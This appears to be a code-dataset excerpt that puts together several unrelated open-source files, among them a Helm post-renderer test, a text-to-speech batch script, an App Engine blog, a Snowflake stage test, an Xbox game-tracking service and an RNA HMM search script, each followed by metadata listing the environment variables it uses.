frames_count = expected_settings["frameEnd"] - \
expected_settings["frameStart"] + 1
expected_settings["frameStart"] = 1.0 + expected_settings["handleStart"]
expected_settings["frameEnd"] = \
expected_settings["frameStart"] + frames_count - 1
return expected_settings
| [] | [] | ["AVALON_TASK"] | [] | ["AVALON_TASK"] | python | 1 | 0 |
pkg/postrender/exec_test.go | /*
Copyright The Helm Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package postrender
import (
"bytes"
"io/ioutil"
"os"
"path/filepath"
"runtime"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/hinfinite/helm/internal/test/ensure"
)
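// testingScript is a minimal post-renderer: it reads rendered manifests on stdin and rewrites FOOTEST to BARTEST.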
const testingScript = `#!/bin/sh
sed s/FOOTEST/BARTEST/g <&0
`
func TestGetFullPath(t *testing.T) {
is := assert.New(t)
t.Run("full path resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
fullPath, err := getFullPath(testpath)
is.NoError(err)
is.Equal(testpath, fullPath)
})
t.Run("relative path resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
currentDir, err := os.Getwd()
require.NoError(t, err)
relative, err := filepath.Rel(currentDir, testpath)
require.NoError(t, err)
fullPath, err := getFullPath(relative)
is.NoError(err)
is.Equal(testpath, fullPath)
})
t.Run("binary in PATH resolves correctly", func(t *testing.T) {
testpath, cleanup := setupTestingScript(t)
defer cleanup()
realPath := os.Getenv("PATH")
os.Setenv("PATH", filepath.Dir(testpath))
defer func() {
os.Setenv("PATH", realPath)
}()
fullPath, err := getFullPath(filepath.Base(testpath))
is.NoError(err)
is.Equal(testpath, fullPath)
})
// NOTE(thomastaylor312): See note in getFullPath for more details why this
// is here
// t.Run("binary in plugin path resolves correctly", func(t *testing.T) {
// testpath, cleanup := setupTestingScript(t)
// defer cleanup()
// realPath := os.Getenv("HELM_PLUGINS")
// os.Setenv("HELM_PLUGINS", filepath.Dir(testpath))
// defer func() {
// os.Setenv("HELM_PLUGINS", realPath)
// }()
// fullPath, err := getFullPath(filepath.Base(testpath))
// is.NoError(err)
// is.Equal(testpath, fullPath)
// })
// t.Run("binary in multiple plugin paths resolves correctly", func(t *testing.T) {
// testpath, cleanup := setupTestingScript(t)
// defer cleanup()
// realPath := os.Getenv("HELM_PLUGINS")
// os.Setenv("HELM_PLUGINS", filepath.Dir(testpath)+string(os.PathListSeparator)+"/another/dir")
// defer func() {
// os.Setenv("HELM_PLUGINS", realPath)
// }()
// fullPath, err := getFullPath(filepath.Base(testpath))
// is.NoError(err)
// is.Equal(testpath, fullPath)
// })
}
func TestExecRun(t *testing.T) {
if runtime.GOOS == "windows" {
// the actual Run test uses a basic sed example, so skip this test on windows
t.Skip("skipping on windows")
}
is := assert.New(t)
testpath, cleanup := setupTestingScript(t)
defer cleanup()
renderer, err := NewExec(testpath)
require.NoError(t, err)
output, err := renderer.Run(bytes.NewBufferString("FOOTEST"))
is.NoError(err)
is.Contains(output.String(), "BARTEST")
}
func setupTestingScript(t *testing.T) (filepath string, cleanup func()) {
t.Helper()
tempdir := ensure.TempDir(t)
f, err := ioutil.TempFile(tempdir, "post-render-test.sh")
if err != nil {
t.Fatalf("unable to create tempfile for testing: %s", err)
}
_, err = f.WriteString(testingScript)
if err != nil {
t.Fatalf("unable to write tempfile for testing: %s", err)
}
err = f.Chmod(0755)
if err != nil {
t.Fatalf("unable to make tempfile executable for testing: %s", err)
}
err = f.Close()
if err != nil {
t.Fatalf("unable to close tempfile after writing: %s", err)
}
return f.Name(), func() {
os.RemoveAll(tempdir)
}
}
| ["\"PATH\"", "\"HELM_PLUGINS\"", "\"HELM_PLUGINS\""] | [] | ["HELM_PLUGINS", "PATH"] | [] | ["HELM_PLUGINS", "PATH"] | go | 2 | 0 |
app.py | import openpyxl as xl
from google.cloud import texttospeech_v1 as tts
import os
wb = xl.load_workbook("input.xlsx")
ws = wb["Sheet1"]
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "key.json"
client = tts.TextToSpeechClient()
voice = tts.VoiceSelectionParams(language_code="en-US", name="en-US-Wavenet-D")
audio_config = tts.AudioConfig(audio_encoding=tts.AudioEncoding.LINEAR16)
file_count = 0
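# Start at row 2 (row 1 is assumed to be a header); column A holds the text, column B the output filename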
for row in range(2, ws.max_row + 1):
text = ws.cell(row, 1).value
filename = ws.cell(row, 2).value
if filename is None:
# check None first, otherwise it would be stringified to "None" by the branch below
filename = "_PLACEHOLDER"
elif not isinstance(filename, str):
filename = str(filename)
input_text = tts.SynthesisInput(text=text)
response = client.synthesize_speech(
request={"input": input_text, "voice": voice, "audio_config": audio_config}
)
with open(filename + ".wav", "wb") as out:
out.write(response.audio_content)
file_count += 1
print(f"{file_count} audio file(s) have been successfully generated!")
| [] | [] | ["GOOGLE_APPLICATION_CREDENTIALS"] | [] | ["GOOGLE_APPLICATION_CREDENTIALS"] | python | 1 | 0 |
blog.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2008 N23 <[email protected]>
# All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# $Id$
import sys
import os
import datetime
import urllib2
import wsgiref.handlers
import re
sys.path.append('modules')
from modules.base import *
from modules.models import *
from modules import PyRSS2Gen
from modules.theme import Theme, ThemeIterator
from modules.config import Config
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
from mimetypes import types_map
class NewPost(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "new"
self.template_values.update({
'mode': 'new',
})
self.render(self.theme.editpost_page)
def post(self):
if self.chk_admin():
title = self.param('title')
content = self.param('post_content')
tags = split_tags(self.param('tags'))
try:
postid = new_post(title = title, author = self.login_user,
content = content, tags = tags)
self.redirect('/blog/post/%d' % postid)
except db.BadValueError, e:
self.redirect('/blog/')
class NewComment(BaseRequestHandler):
def post(self):
if self.chk_login():
content = self.param('comment_content')
postid = self.param('postid')
nick = self.param('nick')
site = self.param('site')
post = Post.get_by_id(int(postid))
try:
comment = Comment(post = post,
content = content,
author = self.login_user)
comment.put()
change_user_info(self.login_user, nick, site)
self.redirect('/blog/post/%s' % postid)
except db.BadValueError, e:
self.redirect('/blog/')
class EditPost(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "new"
#postid = self.request.path[15:]
postid = postIdPattern.findall(self.request.path)[0]
post = Post.get_by_id(int(postid))
self.template_values.update({
'post': post,
'mode': 'edit',
})
self.render(self.theme.editpost_page)
def post(self):
if self.chk_admin():
#postid = self.request.path[15:]
postid = postIdPattern.findall(self.request.path)[0]
edit_post(postid = postid,
title = self.param('title'),
content = self.param('post_content'),
tags = split_tags(self.param('tags')))
self.redirect('/blog/post/%s' % postid)
class EditComment(BaseRequestHandler):
def get(self):
# TODO
self.redirect('/blog/')
def post(self):
# TODO
self.redirect('/blog/')
class DeletePost(BaseRequestHandler):
def get(self):
if self.chk_admin():
postid = self.param('postid')
delete_post(postid)
self.redirect('/blog/')
class DeleteComment(BaseRequestHandler):
def get(self):
if self.chk_login():
commentid = self.param('commentid')
comment = Comment.get_by_id(int(commentid))
if self.login_user == comment.author or self.is_admin:
postid = comment.post.key().id()
comment.delete()
self.redirect('/blog/post/%d' % postid)
else:
self.redirect('/blog/')
class PostList(BaseRequestHandler):
def get(self):
self.current_page = "home"
tag_pattern = re.compile('^/blog/tag/(.*)')
tag_list = tag_pattern.findall(self.request.path)
tag = ''
if tag_list:
tag = tag_list[0]
if tag.find('/') != -1:
tag = tag[:tag.find('/')]
tag = urllib2.unquote(urllib2.unquote(tag)).decode('utf-8')
all_posts = Post.all().filter('tags =', tag)
else:
all_posts = Post.all()
page_size = config.posts_per_page
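# ceiling division: total number of pages needed to show all posts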
max_page = (all_posts.count() + page_size - 1) / page_size
page = 1
page_pattern = re.compile('/page/(\d+)$')
pattern_list = page_pattern.findall(self.request.path)
if pattern_list:
page = int(pattern_list[0])
if page > max_page:
page = max_page
if page <= 0:
page = 1
offset = (page - 1) * page_size
posts = all_posts.order('-date').fetch(page_size, offset = offset)
show_prev = False
show_next = False
show_prev = not (page == 1)
show_next = not (page == max_page)
page_list = []
cnt = 1
while cnt < max_page:
page_list.append(cnt)
cnt += 1
self.template_values.update({
'tag': tag,
'posts': posts,
'post_count': all_posts.count(),
'show_prev': show_prev,
'show_next': show_next,
'prev': page - 1,
'next': page + 1,
'page': page,
'max_page': max_page,
'page_list': page_list,
})
self.render(self.theme.postlist_page)
class ViewPost(BaseRequestHandler):
def get(self):
self.current_page = "home"
#postid = self.request.path[11:]
postid = postIdPattern.findall(self.request.path)[0]
post = Post.get_by_id(int(postid))
comments = Comment.all().filter('post = ', post).order('date')
if not post:
self.redirect('/static/pages/404.html')
else:
self.template_values.update({
'post': post,
'comments': comments,
})
self.render(self.theme.viewpost_page)
class Customize(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "config"
# put the class definition here to avoid caching,
# because we need it list theme dir every time
class ConfigForm(djangoforms.ModelForm):
theme = djangoforms.forms.CharField(
widget = djangoforms.forms.Select(choices = ThemeIterator()))
class Meta:
model = Config
exclude = ('last_config_time')
config_form = ConfigForm(instance = config)
self.template_values.update({
'config_form': config_form,
})
self.render(self.theme.config_page)
def post(self):
if self.chk_admin():
# put the class definition here to avoid caching,
# because we need it list theme dir every time
class ConfigForm(djangoforms.ModelForm):
theme = djangoforms.forms.CharField(
widget = djangoforms.forms.Select(choices = ThemeIterator()))
class Meta:
model = Config
exclude = ('last_config_time')
config_form = ConfigForm(data = self.request.POST,
instance = config)
if config_form.is_valid():
config_form.save(commit=False)
config.last_config_time = \
datetime.datetime.utcnow().replace(microsecond=0)
config.put()
global_vars['theme'] = Theme(config.theme)
self.redirect('/blog/')
else:
self.template_values.update({
'config_form': config_form,
})
self.render(self.theme.config_page)
class RssFeed(BaseRequestHandler):
def get(self):
blog_items = []
feed_title = config.blog_title
if self.request.path.startswith('/blog/feed/tag/'):
# here too, i need unquote twice -_-
tag = urllib2.unquote(urllib2.unquote(
self.request.path[15:])).decode('utf-8')
feed_title += 'Tag: ' + tag
posts = Post.all().filter('tags = ',
tag).order('-date').fetch(config.rss_posts)
elif self.request.path.startswith('/blog/feed'):
posts = Post.all().order('-date').fetch(config.rss_posts)
for post in posts:
post_url = '%s/blog/post/%d' % (self.request.host_url,
post.key().id())
blog_items.append(PyRSS2Gen.RSSItem(
title = post.title,
author = post.author.nickname(),
link = post_url,
description = post.content,
pubDate = post.date,
guid = PyRSS2Gen.Guid(post_url),
categories = post.tags))
rss = PyRSS2Gen.RSS2(
title = config.blog_title,
link = self.request.host_url + '/blog/',
description = 'latest %d posts of %s' % (min(len(blog_items),
config.rss_posts),
config.blog_title),
lastBuildDate = datetime.datetime.utcnow(),
items = blog_items)
self.response.headers['Content-Type'] = \
'application/rss+xml; charset=utf-8'
self.write(rss.to_xml(encoding='utf-8'))
class LogInOut(BaseRequestHandler):
def get(self):
if self.request.path == '/blog/login':
self.redirect(self.get_login_url(True))
if self.request.path == '/blog/logout':
self.redirect(self.get_logout_url(True))
class Upload(BaseRequestHandler):
def get(self):
filename = self.request.path[13:]
split = filename.rfind('.')
if split == -1:
name, ext = filename, ''
else:
name = filename[:split]
ext = filename[split + 1:]
file = UploadFile.get(db.Key(name))
if not file:
self.redirect('/static/pages/404.html')
elif file.ext != ext:
self.redirect('/static/pages/404.html')
else:
ext = '.' + ext
mimetype = 'application/octet-stream'
if ext in types_map:
mimetype = types_map[ext]
self.response.headers['Content-Type'] = mimetype
self.response.headers['Content-Disposition'] = \
'inline; filename="' + file.orig_name.encode('utf-8') + '"'
self.write(file.data)
def post(self):
if self.chk_admin():
filename = self.param('filename')
fileext = self.param('fileext')
data = self.param('upfile')
UploadFile(orig_name = filename, ext = fileext, data = data).put()
self.redirect('/blog/filemanager')
class FileManager(BaseRequestHandler):
def get(self):
if self.chk_admin():
self.current_page = "upload"
files = UploadFile.all().order('-date')
self.template_values.update({
'files': files,
})
self.render(self.theme.filemanager_page)
def post(self): # delete files
if self.chk_admin():
delids = self.request.POST.getall('del')
if delids:
for id in delids:
file = UploadFile.get_by_id(int(id))
file.delete()
self.redirect('/blog/filemanager')
class BlogRollManager(BaseRequestHandler):
def get(self): # delete a link
if self.chk_admin():
delid = self.param('delid')
bloglink = BlogRoll.get_by_id(int(delid))
if bloglink:
bloglink.delete()
self.redirect(self.referer)
def post(self): # add a link
if self.chk_admin():
try:
bloglink = BlogRoll(url = self.param('url'),
text = self.param('text'),
description = self.param('description'))
bloglink.put()
except:
pass
self.redirect(self.referer)
class NotFound(BaseRequestHandler):
def get(self):
self.redirect('/static/pages/404.html')
def main():
webapp.template.register_template_library('filter')
application = webapp.WSGIApplication(
[
#('/', PostList),
('/blog', PostList),
('/blog/', PostList),
('/blog/page/\\d+', PostList),
('/blog/tag/.+/page/\\d+', PostList),
('/blog/tag/.+', PostList),
('/blog/post/\\d+', ViewPost),
('/blog/newpost', NewPost),
('/blog/newcomment', NewComment),
('/blog/editpost/\\d+', EditPost),
('/blog/editcomment/\\d+', EditComment),
('/blog/deletepost', DeletePost),
('/blog/deletecomment', DeleteComment),
('/blog/custom', Customize),
('/blog/feed', RssFead),
('/blog/feed/tag/.+', RssFead),
('/blog/login', LogInOut),
('/blog/logout', LogInOut),
('/blog/upload', Upload),
('/blog/upload/.+', Upload),
('/blog/upload/', FileManager),
('/blog/filemanager', FileManager),
('/blog/addbloglink', BlogRollManager),
('/blog/delbloglink', BlogRollManager),
#('.*', NotFound),
],
debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
| []
| []
| [
"DJANGO_SETTINGS_MODULE"
]
| [] | ["DJANGO_SETTINGS_MODULE"] | python | 1 | 0 | |
put_get_user_stage_test.go | package gosnowflake
import (
"context"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strconv"
"strings"
"testing"
)
func TestPutGetFileSmallDataViaUserStage(t *testing.T) {
if os.Getenv("AWS_ACCESS_KEY_ID") == "" {
t.Skip("this test requires to change the internal parameter")
}
putGetUserStage(t, "", 5, 1, false)
}
func TestPutGetStreamSmallDataViaUserStage(t *testing.T) {
if os.Getenv("AWS_ACCESS_KEY_ID") == "" {
t.Skip("this test requires to change the internal parameter")
}
putGetUserStage(t, "", 1, 1, true)
}
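// putGetUserStage generates temporary data files, uploads them with PUT (optionally as a
// stream) to a user stage backed by the configured S3 bucket, runs COPY INTO and verifies
// the loaded row count.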
func putGetUserStage(t *testing.T, tmpDir string, numberOfFiles int, numberOfLines int, isStream bool) {
if os.Getenv("AWS_SECRET_ACCESS_KEY") == "" {
t.Fatal("no aws secret access key found")
}
tmpDir, _ = ioutil.TempDir(tmpDir, "data")
tmpDir = generateKLinesOfNFiles(numberOfLines, numberOfFiles, false, tmpDir)
defer os.RemoveAll(tmpDir)
var files string
if isStream {
list, _ := ioutil.ReadDir(tmpDir)
file := list[0].Name()
files = filepath.Join(tmpDir, file)
} else {
files = filepath.Join(tmpDir, "file*")
}
runTests(t, dsn, func(dbt *DBTest) {
stageName := fmt.Sprintf("%v_stage_%v_%v", dbname, numberOfFiles, numberOfLines)
dbt.mustExec(fmt.Sprintf("create or replace table %v (aa int, dt date, ts timestamp, tsltz timestamp_ltz, tsntz timestamp_ntz, tstz timestamp_tz, pct float, ratio number(6,2))", dbname))
userBucket := os.Getenv("SF_AWS_USER_BUCKET")
if userBucket == "" {
userBucket = fmt.Sprintf("sfc-dev1-regression/%v/reg", user)
}
dbt.mustExec(fmt.Sprintf("create or replace stage %v url='s3://%v}/%v-%v-%v' credentials = (AWS_KEY_ID='%v' AWS_SECRET_KEY='%v')", stageName, userBucket, stageName, numberOfFiles, numberOfLines, os.Getenv("AWS_ACCESS_KEY_ID"), os.Getenv("AWS_SECRET_ACCESS_KEY")))
dbt.mustExec("alter session set disable_put_and_get_on_external_stage = false")
dbt.mustExec("rm @" + stageName)
var fs *os.File
if isStream {
fs, _ = os.OpenFile(files, os.O_RDONLY, os.ModePerm)
ctx := WithFileStream(context.Background(), fs)
dbt.mustExecContext(ctx, fmt.Sprintf("put 'file://%v' @%v", strings.ReplaceAll(files, "\\", "\\\\"), stageName))
} else {
dbt.mustExec(fmt.Sprintf("put 'file://%v' @%v ", strings.ReplaceAll(files, "\\", "\\\\"), stageName))
}
defer func() {
if isStream {
fs.Close()
}
dbt.mustExec("rm @" + stageName)
dbt.mustExec("drop stage if exists " + stageName)
dbt.mustExec("drop table if exists " + dbname)
}()
dbt.mustExec(fmt.Sprintf("copy into %v from @%v", dbname, stageName))
rows := dbt.mustQuery("select count(*) from " + dbname)
var cnt string
if rows.Next() {
rows.Scan(&cnt)
}
count, _ := strconv.Atoi(cnt)
if count != numberOfFiles*numberOfLines {
t.Errorf("count did not match expected number. count: %v, expected: %v", count, numberOfFiles*numberOfLines)
}
})
}
| [
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_SECRET_ACCESS_KEY\"",
"\"SF_AWS_USER_BUCKET\"",
"\"AWS_ACCESS_KEY_ID\"",
"\"AWS_SECRET_ACCESS_KEY\""
]
| []
| [
"SF_AWS_USER_BUCKET",
"AWS_ACCESS_KEY_ID",
"AWS_SECRET_ACCESS_KEY"
]
| [] | ["SF_AWS_USER_BUCKET", "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY"] | go | 3 | 0 | |
gamefill.go | package main
import (
"database/sql"
"encoding/json"
"flag"
"fmt"
"os"
"time"
"github.com/FederationOfFathers/xboxapi"
"go.uber.org/zap"
gomail "gopkg.in/gomail.v2"
)
const (
platformUnknown = iota
platformXbox360
platformXboxOne
platformWindows
platformIOS
platformAndroid
platformMobile
platformGearVR
platformKindle
)
var cdnPutKey = os.Getenv("CDN_PUT_KEY")
var doGameFill = false
func init() {
flag.BoolVar(&doGameFill, "games", doGameFill, "Dev -- fill games")
}
func initGameFill() {
if !development || doGameFill {
logger.Debug("Doing Game Filling")
handlers[1]["checkGames"] = doCheckGames
crontab.AddFunc("@every 8s", cronwrap("queueFillGames", queueFillGames))
crontab.AddFunc("@every 3600s", cronwrap("doPopulateMissingGamesMeta", doPopulateMissingGamesMeta))
} else {
logger.Debug("Skipping Game Filling")
}
}
func doPopulateMissingGamesMeta(cronID int, name string) {
fillGamesCheck.Exec()
}
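// devicesToPlatform maps the device names reported for a title to one of the platform*
// constants, checking consoles first and falling back to platformUnknown.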
func devicesToPlatform(devices []string) int {
var is = map[string]bool{}
for _, device := range devices {
is[device] = true
}
if is, _ := is["XboxOne"]; is {
return platformXboxOne
}
if is, _ := is["Xbox360"]; is {
return platformXbox360
}
if is, _ := is["Win32"]; is {
return platformWindows
}
if is, _ := is["PC"]; is {
return platformWindows
}
if is, _ := is["iOS"]; is {
return platformIOS
}
if is, _ := is["Android"]; is {
return platformAndroid
}
if is, _ := is["Mobile"]; is {
return platformMobile
}
if is, _ := is["Gear VR"]; is {
return platformGearVR
}
if is, _ := is["Kindle"]; is {
return platformKindle
}
if is, _ := is["Kindle Fire"]; is {
return platformKindle
}
return platformUnknown
}
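// resolveConsole determines the platform of a tilehub title, first from its device list
// and then, if still unknown, by looking the title up through the Xbox API.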
func resolveConsole(title *xboxapi.TilehubTitle, log *zap.Logger) (int, error) {
if kind := devicesToPlatform(title.Devices); kind != platformUnknown {
return kind, nil
}
details, err := getXboxTitleByString(title.TitleID)
if err != nil {
return platformUnknown, err
}
if kind := devicesToPlatform(details.Devices()); kind != platformUnknown {
return kind, nil
}
if len(details.Items) > 0 {
if details.Items[0].MediaGroup == "GameType" {
if details.Items[0].MediaItemType == "DGame" || details.Items[0].MediaItemType == "DGameDemo" {
return platformXboxOne, nil
}
}
}
return platformUnknown, nil
}
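// doFillGame looks up the locally stored record for a title and, if it has no image yet,
// copies the title's display image to the CDN and saves the image key.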
func doFillGame(title *xboxapi.TilehubTitle, platform int) error {
var log = logger.With(
zap.String("function", "resolveConsole"),
zap.Int("platform", platform),
zap.String("title", title.Name),
zap.String("id", title.TitleID))
log.Debug("filling")
var gameID int
var gameName string
var gameImage string
row := getGameInfo.QueryRow(platform, title.TitleID)
if err := row.Scan(&gameID, &gameName, &gameImage); err != nil {
log.Error("error scanning", zap.Error(err))
return err
}
if gameImage == "" && title.DisplayImage != "" {
imageKey := fmt.Sprintf("game-image-%d", gameID)
if err := cdnImage(title.DisplayImage, imageKey); err != nil {
log.Error("error storing image", zap.Error(err))
return err
}
if _, err := setGameInfo.Exec(imageKey, gameID); err != nil {
log.Error("error updating", zap.Error(err))
return err
}
}
return nil
}
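// doCheckGames handles a queued "checkGames" job: it fetches the member's titlehub list,
// resolves each title's platform, creates or updates game and ownership rows, and emails
// an alert when a title reports an unrecognized device type.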
func doCheckGames(job json.RawMessage) error {
var start = time.Now()
var log = logger.With(zap.String("type", "handler"), zap.String("handler", "doCheckGames"))
var user *memberXboxInfo
if err := json.Unmarshal(job, &user); err != nil {
log.Error("Error unmarshalling", zap.Error(err))
return err
}
if _, err := doStmt(setMemberMeta, user.ID, "_games_last_check", timeBuf()); err != nil {
log.Error("Error setting _games_last_check", zap.Error(err))
return err
}
log = log.With(zap.String("member", user.Name), zap.String("xuid", user.XUID))
apiRes, err := xbl.TileHub(user.XUID)
if err != nil {
log.Error("Error checking TileHub", zap.String("username", user.Name), zap.String("xuid", user.XUID), zap.Error(err))
return err
}
var examined = 0
var new = 0
var added = 0
if apiRes == nil || apiRes.Titles == nil || len(apiRes.Titles) < 1 {
log.Info("no titles returned for user titlehub-achievement-list", zap.String("username", user.Name), zap.String("xuid", user.XUID))
} else {
for _, title := range apiRes.Titles {
examined++
resolved, err := resolveConsole(title, log)
if err != nil {
log.Error("error resolving", zap.String("id", title.TitleID), zap.Error(err))
continue
}
if resolved == platformUnknown {
m := gomail.NewMessage()
m.SetHeader("From", "[email protected]")
m.SetHeader("To", "[email protected]")
m.SetHeader("Subject", "Unexpected game device")
buf, _ := json.MarshalIndent(map[string]interface{}{
"user": user,
"title": title,
}, "", "\t")
m.SetBody("text/plain", string(buf))
d := gomail.Dialer{Host: "localhost", Port: 587}
if err := d.DialAndSend(m); err != nil {
log.Error("Error sending email notice...")
}
log.Error("Unexpected game device", zap.String("title", title.Name), zap.String("id", title.TitleID))
continue
}
gameID, err := mysqlCreateGame(resolved, title.TitleID, title.Name)
if err != nil {
log.Error("error creating game", zap.String("title", title.Name), zap.String("id", title.TitleID), zap.Error(err))
return err
}
res, err := ownGame.Exec(user.ID, gameID, title.TitleHistory.LastTimePlayed.Time())
if err != nil {
log.Info(string(title.TitleHistory.LastTimePlayed), zap.Time("parsed", title.TitleHistory.LastTimePlayed.Time()))
log.Error("error owning game", zap.String("title", title.Name), zap.String("id", title.TitleID), zap.Error(err))
return err
}
if id, err := res.LastInsertId(); err != nil && id > 0 {
log.Debug(
"owning",
zap.String("title", title.Name),
zap.String("platform_id", title.TitleID),
zap.Int("platform", resolved),
zap.Int("local_id", gameID),
zap.Int64("relationship", id),
)
added++
} else {
log.Debug(
"updating",
zap.String("title", title.Name),
zap.String("platform_id", title.TitleID),
zap.Int("platform", resolved),
zap.Int("local_id", gameID),
)
}
}
}
log.Info("run complete", zap.Int("games-created", new), zap.Int("added", added), zap.Int("examined", examined), zap.Duration("took", time.Now().Sub(start)))
return nil
}
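// queueFillGames runs from cron: it picks the next member due for a games refresh, stamps
// their _games_last_check meta and enqueues a checkGames job for them.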
func queueFillGames(cronID int, name string) {
var log = logger.With(zap.String("type", "cron"), zap.Int("id", cronID), zap.String("name", name))
var data = memberXboxInfo{}
log.Debug("findNeedGameFill", zap.Int64("seen", agoTs(month)), zap.ByteString("_games_last_check", agoBytes(time.Hour)))
row := findNeedGameFill.QueryRow(agoTs(month), agoBytes(time.Hour))
if row == nil {
log.Debug("no users need games filled")
return
}
if err := row.Scan(&data.ID, &data.XBL, &data.Name, &data.XUID, &data.LastCheck); err != nil {
if err == sql.ErrNoRows {
log.Debug("no users need games filled")
} else {
log.Error("error scanning row", zap.Error(err))
}
return
}
if _, err := doStmt(setMemberMeta, data.ID, "_games_last_check", timeBuf()); err != nil {
log.Error("Error setting _games_last_check", zap.Error(err))
return
}
enqueuev1("checkGames", data)
logger.Debug("queued", zap.String("username", data.Name), zap.String("xuid", data.XUID), zap.Int("userid", data.ID))
}
| [
"\"CDN_PUT_KEY\""
]
| []
| [
"CDN_PUT_KEY"
]
| [] | ["CDN_PUT_KEY"] | go | 1 | 0 | |
tools/rnahmm/rna_hmm/rna_hmm3.py | #! /usr/bin/env python
import os
import sys
import string
import optparse
import fasta
import math
def format(seq, N=60):
nseg = int(math.ceil(len(seq)/(N+0.0)))
return '\n'.join([seq[i * N:(i + 1) * N] for i in range(nseg)])
# write into fasta format file
parser = optparse.OptionParser(version="%prog ")
parser.add_option(
"-i", "--input", dest="input_fasta", action="store",
help="name of input file in fasta format")
parser.add_option(
"-L", "--LibHmm", dest="hmm_path", action="store",
default="HMM3", help="path of hmm database")
parser.add_option(
"-o", "--output", dest="out_fname", action="store",
help="name of output file")
parser.add_option(
"-k", "--kingdoms", dest="kingdoms", action="store",
default="arc,bac", help="kingdom used")
# default="arc,bac,euk", help="kingdom used")
parser.add_option(
"-r", "--hmmsearch", dest="hmmsearch", action="store", default="hmmsearch",
help="path to rnammer executable")
parser.add_option(
"-m", "--moltypes", dest="moltypes", action="store",
default="lsu,ssu,tsu", help="molecule type detected")
# default="lsu,ssu,tsu,lsurnammer,ssurnammer,tsurnammer", help="molecule type detected")
parser.add_option(
"-e", "--Evalue", dest="evalue", action="store", type="float",
default=0.01, help="evalue cut-off for hmmsearch")
parser.add_option(
"-p", "--pThreads", dest="p", action="store", type="int",
default=1, help="number of threads for hmmsearch")
try:
(options, args) = parser.parse_args()
except:
parser.print_help()
sys.exit(1)
if options.input_fasta is None or options.hmm_path is None:
parser.print_help()
sys.exit(1)
# os.environ["HMMERDB"] += ":"+os.path.abspath(options.hmm_path)
# print os.environ["HMMERDB"]
out_fname = os.path.abspath(options.out_fname)
out_dir = os.path.dirname(out_fname)
fname = os.path.abspath(options.input_fasta)
tr = string.maketrans("gatcryswkmbdhvnGATCRYSWKMBDHVN", "ctagyrswmkvhdbnCTAGYRSWMKVHDBN")
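# Build a FASTA entry for the reverse complement of a record (header suffixed with "|rev").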
def rev_record(record):
return ">" + record.header + "|rev\n" + format(record.sequence[::-1].translate(tr))
records = [rec for rec in fasta.fasta_itr(fname)]
headers = [[rec.header, len(rec.sequence)] for rec in records]
ff = open(out_fname + '.fa', 'w')
for (i, rec) in enumerate(records):
ff.write('>s' + str(i) + '\n' + format(rec.sequence) + '\n')
ff.write('>s' + str(i) + '|rev\n' + format(rec.sequence[::-1].translate(tr)) + '\n')
ff.close()
# sys.exit(1)
# a temporary fasta file, use s(int) to easy the parsing
def parse_hmmsearch(kingdom, moltype, src):
# function to parse hmmsearch output
resu = []
data = open(src).readlines()
# inds = [-1] + [i for (i, x) in enumerate(data[2]) if x == " "]
# inds = [(inds[j] + 1, inds[j + 1]) for j in range(len(inds) - 1)]
data = [line for line in data if line[0] != "#"]
for line in data:
if not len(line.strip()):
continue
[
read, acc, tlen, qname, qaccr, qlen, seq_evalue, seq_score, seq_bias,
seq_num, seq_of, dom_cEvalue, dom_iEvalue, dom_score, dom_bias,
hmm_start, hmm_end, dom_start, dom_end, env_start, env_end] = line.split()[:21]
# [line[x[0]:x[1]].strip() for x in inds[:21]]
if string.atof(dom_iEvalue) < options.evalue:
# resu.append("\t".join([read, acc, tlen, qname, qaccr, \
# qlen, seq_evalue, seq_score, seq_bias, seq_num, seq_of, \
# dom_cEvalue, dom_iEvalue, dom_score, dom_bias, hmm_start, \
# hmm_end, dom_start, dom_end, env_start, env_end]))
resu.append("\t".join([qname, dom_start, dom_end, read, dom_iEvalue]))
# print resu[0]
# print resu[-1]
return resu
hmm_resu = []
for kingdom in options.kingdoms.split(','):
for moltype in options.moltypes.split(','):
# print kingdom, moltype
hmm_out_fname = "%s.%s_%s.out" % (out_fname, kingdom, moltype)
dom_out_fname = "%s.%s_%s.dom" % (out_fname, kingdom, moltype)
cmd = '%s --cpu %d -o %s --domtblout %s -E %g %s/%s_%s.hmm %s' % \
(options.hmmsearch, options.p, hmm_out_fname, dom_out_fname,
options.evalue, os.path.abspath(options.hmm_path), kingdom, moltype, out_fname + '.fa')
# print cmd
# hmm_resu += parse_hmmsearch(os.popen(cmd))
# print cmd
os.system(cmd)
hmm_resu += parse_hmmsearch(kingdom, moltype, dom_out_fname)
os.remove(hmm_out_fname)
os.remove(dom_out_fname)
dict_read2kingdom = {}
for line in hmm_resu:
[feature_type, r_start, r_end, read, evalue] = line.strip().split('\t')
read = read.split('|')[0]
evalue = string.atof(evalue)
kingdom = feature_type.split('_')[0]
if read in dict_read2kingdom:
if evalue < dict_read2kingdom[read][1]:
dict_read2kingdom[read] = [kingdom, evalue]
else:
dict_read2kingdom[read] = [kingdom, evalue]
